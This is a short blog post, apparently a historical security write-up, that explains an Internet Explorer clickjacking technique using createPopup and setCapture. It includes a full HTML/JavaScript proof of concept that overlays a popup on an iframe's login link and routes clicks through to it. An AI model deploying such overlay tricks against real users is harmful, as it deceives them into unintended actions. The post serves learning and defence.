Clickjacking via createPopup and setCapture

Combining createPopup and setCapture produced a clean clickjacking setup. The popup appeared over the target iFrame as a visible overlay, but because setCapture redirected mouse input to the main document, clicks landing on the popup were actually delivered to the iFrame content beneath it — making the popup effectively invisible to click events while remaining visually opaque.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>ClickJack_createPopup_setCapture</title>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
</head>
<body>
<iframe sandbox src="http://en.wikipedia.org/wiki/Clickjacking" width="800" height="220"></iframe>

<script>
function main()
{
	document.body.onclick = function()
	{
		document.body.releaseCapture();
		document.body.onclick = null;
	}
	setTimeout("document.body.setCapture();", 1000);

	var cp = createPopup();
	cp.document.bgColor = "red";
	cp.show(740, 12, 34, 16, document.all.tags("iframe")[0]);
}
</script>
</body>
</html>

The red popup covered the Wikipedia “Log in” link exactly, but setCapture on document.body caused all mouse events to be delivered to the body element instead — which then propagated them through to the iFrame below the popup. A user clicking on what appeared to be the attacker’s red box was actually clicking on the iFrame’s content. This is a nice illustration of why setCapture and overlay elements need to be considered together in clickjacking defenses.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS: document.open/close on createHTMLDocument or XHR Response Document] :: [Pop-up Blocker Bypass via iFrame htmlFile ActiveX Chain] >